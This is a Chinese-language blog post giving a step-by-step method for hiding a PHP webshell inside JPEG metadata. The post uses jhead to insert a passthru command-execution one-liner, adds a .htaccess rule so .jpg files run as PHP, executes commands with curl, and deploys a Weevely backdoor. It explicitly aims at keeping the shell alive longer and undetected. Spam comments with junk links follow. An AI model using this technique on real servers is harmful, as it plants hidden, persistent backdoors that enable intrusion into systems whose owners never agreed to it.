#From: Focusecurity.Org

    通过jpeg图片隐藏webshell代码已经不是新鲜事了,综合之前在Exploit-db上看到的“FCKeditor all versian Arbitrary File Upload Vulnerability”一文,通过在jpeg文件中隐藏webshell代码能够大大增加其存活周期,还不容易被发现。以下是个人想法。

具体步骤

1.准备jhead和一张小的jpeg图片;(补充下:jhead工具可以修改jpeg文件的metadata内容,开源,支持多个平台运行)

2.通过jhead为jpeg图片附加一句话的webshell代码:

以下是引用片段:

jhead.exe -ce test.JPG

    附加后的test.jpg如下:

以下是引用片段:

File name    : test.JPG
File size    : 1343 bytes
File date    : 2011:10:10 16:34:04
Resolution   : 76 x 70
Comment      : <?php passthru($_POST['cmd']); __halt_compiler();

    我们可以看到在Comment中已经加入了一句话代码。

3.建立.htaccess文件并增加文件解析类型:

以下是引用片段:

echo "AddType application/x-httpd-php .jpg" >> .htaccess

4.将test.jpg文件与.htaccess文件上传,执行

以下是引用片段:

curl -d cmd=id http://127.0.0.1/test.jpg

    即可执行命令了。

    再进一步,我们可以通过weevely来执行命令:

以下是引用片段:

weevely.py -g -o back.php -p admin

    生成一个back.php文件,密码为admin,

以下是引用片段:

weevely.py -t -p admin -u http://127.0.0.1/test.jpg

    即可在本地shell执行命令.

参考

https://bechtsoudis.com/hacking/php-code-into-jpeg-metadata-from-hide-to-unhide/

--The End--

留言评论(旧系统):

【匿名者】 @ 2012-06-19 23:44:24

If I were a Teenage Mutant Ninja Turtle, now I'd say "Kowagubna, dude!"

本站回复:

You are a Frenchman?! You can read Chinese characters?! Overseas Chinese?! That is very rare!!! dude! Nice to meet you!

【匿名者】 @ 2012-06-20 20:24:40

tYDB6X <a href="http://fulmiztoivph.com/">fulmiztoivph</a>

本站回复:

sb!

【匿名者】 @ 2012-06-22 04:40:03

wh2C2w , [url=http://lcdgvmekkwfe.com/]lcdgvmekkwfe[/url], [link=http://ggzhnbqvkbvl.com/]ggzhnbqvkbvl[/link], http://rmhkkmeuefmt.com/

本站回复:

sb!

【匿名者】 @ 2012-06-22 10:14:43

PNuIh7 <a href="http://edzkxyazglys.com/">edzkxyazglys</a>

本站回复:

【匿名者】 @ 2012-06-22 23:16:10

1rKRVc , [url=http://mojxczzmtdra.com/]mojxczzmtdra[/url], [link=http://bbirfxgvusqa.com/]bbirfxgvusqa[/link], http://dnfphcipihjb.com/

本站回复:

Who Let The Dogs Out!